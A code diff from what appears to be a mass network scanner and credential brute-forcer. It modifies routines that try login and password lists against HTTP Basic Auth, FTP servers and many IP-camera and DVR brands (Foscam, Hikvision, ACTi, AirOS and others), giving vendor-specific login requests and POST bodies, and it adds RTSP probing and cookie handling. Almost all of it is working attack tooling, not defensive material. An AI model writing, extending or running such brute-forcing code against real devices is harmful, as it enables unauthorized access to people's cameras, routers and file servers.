diff --git a/BasicAuth.cpp b/BasicAuth.cpp
index c1179d3..7a38169 100644
--- a/BasicAuth.cpp
+++ b/BasicAuth.cpp
@@ -1,5 +1,4 @@
#include "BasicAuth.h"
-#include "FileUpdater.h"
int BA::checkOutput(const string *buffer, const char *ip, const int port) {
if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
@@ -45,7 +44,40 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode
return 0;
}
-lopaStr BA::BABrute(const char *ip, const int port) {
+std::string getLocation(const std::string *buff) {
+ std::string buffLower = *buff;
+ std::transform(buffLower.begin(), buffLower.end(), buffLower.begin(), ::tolower);
+ int pos1 = buffLower.find("location: ");
+
+ if (-1 != pos1) {
+ std::string location = buff->substr(pos1 + 10, buff->find("\r\n", pos1) - pos1 - 10);
+ return location;
+ }
+
+ return "";
+}
+
+void setNewIP(const char *ipOrig, char *ip, std::string *buff, int size) {
+ strncpy(ip, ipOrig, size);
+ const std::string &location = getLocation(buff);
+ if (location.size() > 0) {
+ if (Utils::ustrstr(location, "http") != -1) {
+ strncpy(ip, location.c_str(), size);
+ }
+ else {
+ int ipLength = (int)strstr(ipOrig + 8, "/");
+ if (0 != ipLength) {
+ strncpy(ip, ipOrig, ipLength);
+ strncat(ip, location.c_str(), size - ipLength);
+ }
+ else {
+ strncat(ip, location.c_str(), size);
+ }
+ }
+ }
+}
+
+lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) {
bool digestMode = true;
string lpString;
lopaStr lps = {"UNKNOWN", "", ""};
@@ -56,22 +88,63 @@ lopaStr BA::BABrute(const char *ip, const int port) {
std::string buff;
Connector con;
- int sz = con.nConnect(ip, port, &buff);
- //QString ipString = QString(ip).mid(0, QString(ip).indexOf("/", 8)) + ":" + QString::number(port);
- QString ipString = QString(ip);
- if (sz == 0) {
- //Retry
- Sleep(2000);
+ int sz = con.nConnect(ipOrig, port, &buff);
- if (sz == 0) {
+ char ip[256] = { 0 };
+
+ if (sz == 0) {
+ if (performDoubleCheck) {
+ //Retry
+ Sleep(gTimeOut);
+ sz = con.nConnect(ip, port, &buff);
+ if (sz == 0) {
+ Sleep(gTimeOut);
+ sz = con.nConnect(ip, port, &buff);
+ if (sz == 0) {
+ QString ipString = QString(ip);
+ stt->doEmitionFoundData("Empty BA probe - " + ipString + "");
+ return lps;
+ }
+ else {
+ setNewIP(ipOrig, ip, &buff, 256);
+ }
+ }
+ else {
+ setNewIP(ipOrig, ip, &buff, 256);
+ }
+ }
+ else {
+ QString ipString = QString(ip);
stt->doEmitionFoundData("Empty BA probe - " + ipString + "");
return lps;
}
}
+ else {
+ setNewIP(ipOrig, ip, &buff, 256);
+ }
+
int isDig = Utils::isDigest(&buff);
if (isDig == -1) {
- stt->doEmitionFoundData("No 401 found - " +
- ipString + "");
+ if (performDoubleCheck) {
+ Sleep(gTimeOut);
+ int sz = con.nConnect(ip, port, &buff);
+ isDig = Utils::isDigest(&buff);
+ if (isDig == -1) {
+ Sleep(gTimeOut);
+ int sz = con.nConnect(ip, port, &buff);
+ isDig = Utils::isDigest(&buff);
+ if (isDig == -1) {
+ QString ipString = QString(ip);
+ stt->doEmitionFoundData("No 401 found - " + ipString + "");
+ return lps;
+ }
+ }
+ }
+ else {
+ QString ipString = QString(ip);
+ stt->doEmitionFoundData("No 401 found - " + ipString + "");
+ return lps;
+ }
}
else if (isDig == 1) digestMode = true;
else digestMode = false;
@@ -99,7 +172,7 @@ lopaStr BA::BABrute(const char *ip, const int port) {
if (res == -2) {
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "404");
+ nesca_3::addBARow(QString(ip), "--", "404");
}
else {
stt->doEmitionChangeBARow(rowIndex, "--", "404");
@@ -113,7 +186,7 @@ lopaStr BA::BABrute(const char *ip, const int port) {
}
if (res == 1) {
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
+ nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
}
else {
stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
@@ -127,7 +200,7 @@ lopaStr BA::BABrute(const char *ip, const int port) {
if (BALogSwitched) {
if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port),
+ rowIndex = nesca_3::addBARow(QString(ip),
QString(loginLst[i]) + ":" + QString(passLst[j]),
QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
}
@@ -143,7 +216,7 @@ lopaStr BA::BABrute(const char *ip, const int port) {
}
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
+ nesca_3::addBARow(QString(ip), "--", "FAIL");
}
else {
stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
@@ -151,7 +224,7 @@ lopaStr BA::BABrute(const char *ip, const int port) {
return lps;
}
-lopaStr BA::BALobby(const char *ip, const int port) {
+lopaStr BA::BALobby(const char *ip, const int port, bool performDoubleCheck) {
if(gMaxBrutingThreads > 0) {
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
@@ -159,7 +232,7 @@ lopaStr BA::BALobby(const char *ip, const int port) {
++baCount;
++BrutingThrds;
stt->doEmitionUpdateArc(gTargets);
- const lopaStr &lps = BABrute(ip, port);
+ const lopaStr &lps = BABrute(ip, port, performDoubleCheck);
--BrutingThrds;
return lps;
diff --git a/BasicAuth.h b/BasicAuth.h
index e84f625..1a5dc4b 100644
--- a/BasicAuth.h
+++ b/BasicAuth.h
@@ -8,11 +8,11 @@
class BA {
private:
- static lopaStr BABrute(const char *ip, const int port);
+ static lopaStr BABrute(const char *ip, const int port, bool performDoubleCheck);
public:
static int checkOutput(const string *buffer, const char *ip, const int port);
- static lopaStr BALobby(const char *ip, const int port);
+ static lopaStr BALobby(const char *ip, const int port, bool performDoubleCheck);
};
#endif // BASICAUTH_H
diff --git a/Connector.cpp b/Connector.cpp
index 60f93ea..024c2f0 100644
--- a/Connector.cpp
+++ b/Connector.cpp
@@ -97,10 +97,18 @@ int my_trace(CURL *handle, curl_infotype type,
void *userp)
{
if (type == CURLINFO_HEADER_OUT) {
- data[size] = '\0';
- Activity += strlen(data);
- stt->doEmitionAddOutData(QString(data));
+ //data[size] = '\0';
+ //Activity += strlen(data);
+ QString qData = QString(data);
+ Activity += qData.length();
+ stt->doEmitionAddOutData(qData);
+ data[0] = '\0';
}
+ //else if (type == CURLINFO_HEADER_IN) {
+ // QString qData = QString(data);
+ // Activity += qData.length();
+ // stt->doEmitionAddIncData("", qData);
+ //}
return 0;
}
@@ -147,7 +155,7 @@ int pConnect(const char* ip, const int port, std::string *buffer,
struct data config;
config.trace_ascii = 1; /* enable ascii tracing */
curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace);
- curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
+ //curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
curl_easy_setopt(curl, CURLOPT_URL, ip);
@@ -166,6 +174,7 @@ int pConnect(const char* ip, const int port, std::string *buffer,
curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
+ curl_easy_setopt(curl, CURLOPT_COOKIEFILE, "");
if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData);
@@ -200,8 +209,6 @@ int pConnect(const char* ip, const int port, std::string *buffer,
curl_easy_cleanup(curl);
if (res == CURLE_OK || (port == 21 && sz > 0)) {
- if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
- Activity += sz;
return sz;
}
else if (res == CURLE_LOGIN_DENIED && port == 21) {
@@ -241,19 +248,12 @@ int pConnect(const char* ip, const int port, std::string *buffer,
return -2;
}
else if (res == 8) {
- stt->doEmitionFoundData("Strange ftp reply. (" +
- QString::number(res) + ") " + QString(ip) +
- ":" + QString::number(port));
return -2;
}
else if (res == 18) {
- stt->doEmitionFoundData("Inappropriate file size. (" +
- QString::number(res) + ") " + QString(ip) +
- ":" + QString::number(port));
return -2;
}
- else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " +
- QString(ip) + ":" + QString::number(port));
+ else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip));
};
//if (res == 23 && sz > 0) {
@@ -263,6 +263,140 @@ int pConnect(const char* ip, const int port, std::string *buffer,
//else return -1;
}
+ return sz;
+ }
+ else {
+ stt->doEmitionRedFoundData("Curl error.");
+ return -1;
+ };
+}
+int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString)
+{
+ buffer->clear();
+ int res = 0;
+ CURL *curl = curl_easy_init();
+
+ if (curl != NULL)
+ {
+ //curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
+ if (MapWidgetOpened) {
+ struct data config;
+ config.trace_ascii = 1; /* enable ascii tracing */
+ curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace);
+ curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
+ curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
+ }
+
+ char newIP[128] = {0};
+ strcpy(newIP, "rtsp://");
+ strncat(newIP, ip, 96);
+ strcat(newIP, "/ch1/main");
+ /*int y = curl_easy_setopt(curl, CURLOPT_VERBOSE, 0L);
+ y = curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L);
+ y = curl_easy_setopt(curl, CURLOPT_HEADERDATA, stdout);*/
+ //curl_easy_setopt(curl, CURLOPT_URL, newIP);
+ //curl_easy_setopt(curl, CURLOPT_PORT, port);
+ curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, newIP);
+ //y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS);
+ //int y = curl_easy_setopt(curl, CURLOPT_URL, ip);
+ //y = curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
+ //curl_easy_setopt(curl, CURLOPT_PORT, port);
+ /*y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS);
+ res = curl_easy_perform(curl);
+ y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);*/
+ res = curl_easy_perform(curl);
+
+ //curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);
+ //curl_easy_setopt(curl, CURLOPT_USERAGENT,
+ // "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
+ //curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
+ //curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
+ //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
+ //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
+ //curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
+ //curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
+ //int proxyPort = std::atoi(gProxyPort);
+ //if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
+ //curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
+ ////curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
+ //curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
+ //curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
+
+ //if (lpString != NULL) {
+ // curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L);
+ // //curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L);
+ // curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
+ // //curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
+ // res = curl_easy_perform(curl);
+ // /*if (digestMode)
+ // {
+ // curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
+ // res = curl_easy_perform(curl);
+
+ // if (port != 21 && lpString != NULL) {
+ // int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
+ // if (pos != -1) {
+ // *buffer = buffer->substr(pos + 4);
+ // }
+ // }
+ // }
+ // else res = curl_easy_perform(curl);*/
+ //}
+ //else res = curl_easy_perform(curl);
+
+ int sz = buffer->size();
+
+ curl_easy_cleanup(curl);
+ if (res == CURLE_OK || (port == 21 && sz > 0)) {
+ if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
+ Activity += sz;
+ return sz;
+ }
+ else if (res == CURLE_LOGIN_DENIED && port == 21) {
+ return -1;
+ }
+ else if (res == CURLE_OPERATION_TIMEDOUT
+ || res == CURLE_COULDNT_CONNECT
+ || res == CURLE_SEND_ERROR
+ || res == CURLE_RECV_ERROR
+ ) {
+ SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+ shutdown(eNobuffSocket, SD_BOTH);
+ closesocket(eNobuffSocket);
+ if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) {
+ stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec...");
+ Sleep(10000);
+ }
+ return -1;
+ }
+ else {
+ if (res == 6) return -2;
+ else if (res != 13 &&
+ res != 67 &&
+ res != 52 &&
+ res != 56 &&
+ res != 35 &&
+ res != 19 &&
+ res != 23)
+ {
+ if (res == 5) {
+ stt->doEmitionRedFoundData("The given proxy host could not be resolved.");
+ return -2;
+ }
+ else if (res == 8) {
+ stt->doEmitionFoundData("Strange ftp reply. (" +
+ QString::number(res) + ") " + QString(ip));
+ return -2;
+ }
+ else if (res == 18) {
+ return -2;
+ }
+ else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip));
+ };
+
+ return sz;
+ }
+
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
return sz;
@@ -295,10 +429,21 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
const char *postData,
const std::vector *customHeaders,
const std::string *lpString,
- bool digestMode){
- int res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode);
+ bool digestMode,
+ bool isRTSP){
+ int res = 0;
+
+ if (!isRTSP) {
+ res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode);
+ }
+ else {
+ res = pConnectRTSP(ip, port, buffer, lpString);
+ }
cutoutComments(buffer);
+ if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
+ Activity += buffer->size();
+
return res;
}
@@ -402,8 +547,8 @@ bool portCheck(const char * sDVRIP, int wDVRPort) {
else {
if (gNegDebugMode)
{
- stt->doEmitionDebugFoundData("Port check succeeded (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + ":" + QString::number(wDVRPort) + "]");
+ stt->doEmitionDebugFoundData("Port check succeeded (curl_code: " + QString::number(res) + ") [" + QString(sDVRIP) + "]");
}
return true;
}
@@ -429,15 +574,18 @@ int Connector::connectToPort(char* ip, int port)
char tempIp[128] = { 0 };
int sz = strlen(ip);
if (443 == port) {
- strcpy(tempIp, "https://");
+ sprintf(tempIp, "https://%s:%d", ip, port);
+ //strcpy(tempIp, "https://");
}
else if (21 == port) {
- strcpy(tempIp, "ftp://");
+ //strcpy(tempIp, "ftp://");
+ sprintf(tempIp, "ftp://%s:%d", ip, port);
}
else {
- strcpy(tempIp, "http://");
+ //strcpy(tempIp, "http://");
+ sprintf(tempIp, "http://%s:%d", ip, port);
}
- strncat(tempIp, ip, sz > 119 ? 119 : sz);
+ //strncat(tempIp, ip, sz > 96 ? 96 : sz);
if (port != 37777 && port != 8000 && port != 34567 && port != 9000){
if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); //SSH
@@ -448,7 +596,7 @@ int Connector::connectToPort(char* ip, int port)
++Alive;//ME2
++found;//PieStat
Lexems lx;
- lx.filler(tempIp, port, &buffer, size, &lx);
+ lx.filler(tempIp, ip, port, &buffer, size, &lx);
}
else if (size == -2) return -2;
} else {
@@ -456,7 +604,7 @@ int Connector::connectToPort(char* ip, int port)
++Alive;//ME2
++found;//PieStat
Lexems lx;
- lx.filler(ip, port, &buffer, size, &lx);
+ lx.filler(ip, ip, port, &buffer, size, &lx);
};
}
return 0;
diff --git a/Connector.h b/Connector.h
index 62ef8a3..d663440 100644
--- a/Connector.h
+++ b/Connector.h
@@ -38,7 +38,8 @@ public:
const char *postData = NULL,
const std::vector *customHeaders = NULL,
const std::string *lpString = NULL,
- bool digestMode = false);
+ bool digestMode = false,
+ bool isRTSP = false);
int connectToPort(char *ip, int port);
};
#endif // CONNECTOR_H
diff --git a/DrawerTh_ME2Scanner.cpp b/DrawerTh_ME2Scanner.cpp
index 7cec52c..ea4d6e0 100644
--- a/DrawerTh_ME2Scanner.cpp
+++ b/DrawerTh_ME2Scanner.cpp
@@ -34,13 +34,14 @@ int MakePolygonLine(int gWidth)
fact7 = 0;
bool state = stt->isRunning();
- for(int i = 1; i < 130; ++i)
+ int activityVal = log(1 + Activity)/3 + 2;
+ for(int i = 1; i < 136; ++i)
{
x = qrand() % 4 + i;
xtx = x + tx;
if(xtx > 1 && xtx < 31)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - camerasC1 * 2 - fact1 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - camerasC1 * 2 - fact1 : ME2YPOS);
if (camerasC1 > 0)
{
if(xtx < 16 ) fact1+=2;
@@ -50,7 +51,7 @@ int MakePolygonLine(int gWidth)
if(xtx > 34 && xtx < 72)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - /*WF*/0 * 2 - fact2 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - /*WF*/0 * 2 - fact2 : ME2YPOS);
if(/*WF*/0 > 0)
{
@@ -61,7 +62,7 @@ int MakePolygonLine(int gWidth)
if(xtx > 74 && xtx < 112)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - baCount * 2 - fact3 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - baCount * 2 - fact3 : ME2YPOS);
if (baCount > 0)
{
@@ -72,7 +73,7 @@ int MakePolygonLine(int gWidth)
if(xtx > 114 && xtx < 152)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - other * 2 - fact4 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - other * 2 - fact4 : ME2YPOS);
if (other > 0)
{
@@ -83,7 +84,7 @@ int MakePolygonLine(int gWidth)
if(xtx > 154 && xtx < 192)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - Overl * 2 - fact5 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - Overl * 2 - fact5 : ME2YPOS);
if(Overl > 0)
{
@@ -94,7 +95,7 @@ int MakePolygonLine(int gWidth)
if(xtx > 194 && xtx < 232)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - /*Lowl*/0 * 2 - fact6 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - /*Lowl*/0 * 2 - fact6 : ME2YPOS);
if(/*Lowl*/0 > 0)
{
@@ -105,7 +106,7 @@ int MakePolygonLine(int gWidth)
if(xtx > 234 && xtx < 278)
{
- qp = QPointF(xtx, state ? qrand() % 3 + ME2YPOS - Alive * 2 - fact7 : ME2YPOS);
+ qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - Alive * 2 - fact7 : ME2YPOS);
if(Alive > 0)
{
diff --git a/FTPAuth.cpp b/FTPAuth.cpp
index e2cb4f1..969f4ea 100644
--- a/FTPAuth.cpp
+++ b/FTPAuth.cpp
@@ -37,13 +37,14 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
strcpy(pass, ftpPassLst[j]);
if (strlen(pass) <= 1) continue;
- lpString = string(login) + ":" + string(pass);
+ lpString = string(login)
+ + string(pass);
Connector con;
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString);
if (res == -2) {
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
+ nesca_3::addBARow(QString(ip), "--", "FAIL");
}
else {
stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
@@ -57,7 +58,7 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(login) + ":" + QString(pass), "OK");
+ nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK");
}
else {
stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
@@ -68,7 +69,7 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
if (BALogSwitched) {
if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port),
+ rowIndex = nesca_3::addBARow(QString(ip),
QString(login) + ":" + QString(pass),
QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%");
}
@@ -84,7 +85,7 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
}
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
+ nesca_3::addBARow(QString(ip), "--", "FAIL");
}
else {
stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
diff --git a/IPCAuth.cpp b/IPCAuth.cpp
index 6c79c0e..6abf528 100644
--- a/IPCAuth.cpp
+++ b/IPCAuth.cpp
@@ -3,7 +3,7 @@
#include "BruteUtils.h"
#include "FileUpdater.h"
-lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
+lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie)
{
lopaStr lps = {"UNKNOWN", "", ""};
bool result = true;
@@ -83,6 +83,14 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
{
negVector.push_back("errno=\"4\"");
}
+ else if (strcmp(SPEC, "ACTi") == 0)
+ {
+ negVector.push_back("ERROR: ");
+ }
+ else if (strcmp(SPEC, "AirOS") == 0)
+ {
+ negVector.push_back("Invalid credentials");
+ }
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@@ -112,90 +120,129 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
request[0] = 0;
if(strcmp(SPEC, "IPC") == 0)
{
- sprintf(request, "%s:%d/login.xml?user=%s&usr=%s&password=%s&pwd=%s",
- ip, port, login, login, pass, pass);
+ sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s",
+ ip, login, login, pass, pass);
}
else if(strcmp(SPEC, "GEO") == 0)
{
- sprintf(request, "%s:%d/Login.cgi?username=%s&password=%s",
- ip, port, login, pass);
+ sprintf(request, "%s/Login.cgi?username=%s&password=%s",
+ ip, login, pass);
}
else if(strcmp(SPEC, "EasyCam") == 0)
{
- sprintf(request, "%s:%d/login.xml?user=%s&usr=%s&password=%s&pwd=%s",
- ip, port, login, login, pass, pass);
+ sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s",
+ ip, login, login, pass, pass);
}
else if(strcmp(SPEC, "Foscam") == 0)
{
- sprintf(request, "%s:%d/cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s",
- ip, port, login, pass, login, pass);
+ sprintf(request, "%s/cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s",
+ ip, login, pass, login, pass);
}
else if(strcmp(SPEC, "AVIOSYS") == 0)
{
- sprintf(request, "%s:%d/check_user.html?UserName=%s&PassWord=%s",
- ip, port, login, pass);
+ sprintf(request, "%s/check_user.html?UserName=%s&PassWord=%s",
+ ip, login, pass);
}
else if(strcmp(SPEC, "IPCAM") == 0)
{
- sprintf(request, "%s:%d/cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831",
- ip, port, login, pass);
+ sprintf(request, "%s/cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831",
+ ip, login, pass);
}
else if(strcmp(SPEC, "IEORFOREFOX") == 0)
{
doPost = true;
- sprintf(request, "%s:%d/logincheck.rsp?type=1", ip, port);
+ sprintf(request, "%s/logincheck.rsp?type=1", ip);
sprintf(postData, "username=%s&userpwd=%s", login, pass);
}
else if(strcmp(SPEC, "BUFFALO") == 0)
{
doPost = true;
- sprintf(request, "%s:%d/rpc/login", ip, port);
+ sprintf(request, "%s/rpc/login", ip);
sprintf(postData, "user=%s&password=%s", login, pass);
}
else if (strcmp(SPEC, "DVS") == 0)
{
doPost = true;
- sprintf(request, "%s:%d/login", ip, port);
+ sprintf(request, "%s/login", ip);
sprintf(postData, "langs=en&user=%s&password=%s&submit=+Login+", login, pass);
}
else if (strcmp(SPEC, "MASPRO") == 0)
{
doPost = true;
- sprintf(request, "%s:%d/setup_login.cgi", ip, port);
+ sprintf(request, "%s/setup_login.cgi", ip);
sprintf(postData, "check_username=%s&check_password=%s&login=", login, pass);
}
else if (strcmp(SPEC, "WEBCAMXP") == 0)
{
doPost = true;
- sprintf(request, "%s:%d/login.html", ip, port);
+ sprintf(request, "%s/login.html", ip);
sprintf(postData, "username=%s&password=%s&Redir=/", login, pass);
}
else if (strcmp(SPEC, "JASSUN") == 0)
{
doPost = true;
- sprintf(request, "%s:%d/Login.htm", ip, port);
+ sprintf(request, "%s/Login.htm", ip);
sprintf(postData, "command=login&username=%s&password=%s", login, pass);
}
else if (strcmp(SPEC, "BEWARD") == 0)
{
- sprintf(request, "%s:%d/webs/httplogin?username=%s&password=%s&UserID=45637757",
- ip, port, login, pass);
+ sprintf(request, "%s/webs/httplogin?username=%s&password=%s&UserID=45637757",
+ ip, login, pass);
}
else if (strcmp(SPEC, "JUAN") == 0)
{
//sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693",
- sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693",
- ip, port, login, pass);
+ sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693",
+ ip, login, pass);
+ }
+ else if (strcmp(SPEC, "ACTi") == 0)
+ {
+ doPost = true;
+ sprintf(request, "%s/cgi-bin/videoconfiguration.cgi", ip);
+ sprintf(postData, "LOGIN_ACCOUNT=%s&LOGIN_PASSWORD=%s", login, pass);
+ }
+ else if (strcmp(SPEC, "AirOS") == 0)
+ {
+ doPost = true;
+ sprintf(request, "%s/login.cgi", ip);
+ char tempPostData[1024] = { 0 };
+ int cl = 341 + strlen(login) + strlen(pass);
+ sprintf(tempPostData, "-----------------------------170381307613422\r\n\
+Content-Disposition: form-data; name=\"uri\"\r\n\
+\r\n\
+/\r\n\
+-----------------------------170381307613422\r\n\
+Content-Disposition: form-data; name=\"username\"\r\n\
+\r\n\
+%s\r\n\
+-----------------------------170381307613422\r\n\
+Content-Disposition: form-data; name=\"password\"\r\n\
+\r\n\
+%s\r\n\
+-----------------------------170381307613422--\
+\r\n", login, pass);
+
+ sprintf(postData, "Content-Type: multipart/form-data; boundary=---------------------------170381307613422\r\n\
+Content-Length: %d\r\n\r\n\
+%s", cl, tempPostData);
+ }
+
+ std::string buffer;
+ if (cookie->size() > 0) {
+ std::vector cookieHeader{ *cookie };
+ Connector con;
+ if (doPost) res = con.nConnect(request, port, &buffer, postData, &cookieHeader);
+ else res = con.nConnect(request, port, &buffer, NULL, &cookieHeader);
+ }
+ else {
+ Connector con;
+ if (doPost) res = con.nConnect(request, port, &buffer, postData);
+ else res = con.nConnect(request, port, &buffer);
}
-
- std::string buffer;
- Connector con;
- if (doPost) res = con.nConnect(request, port, &buffer, postData);
- else res = con.nConnect(request, port, &buffer);
if (res == -2) {
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL");
+ nesca_3::addBARow(QString(ip), "--", "FAIL");
}
else {
stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
@@ -218,7 +265,7 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC)
strcpy(lps.pass, passLst[j]);
if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(login) + ":" + QString(pass), "OK");
+ nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK");
}
else {
stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
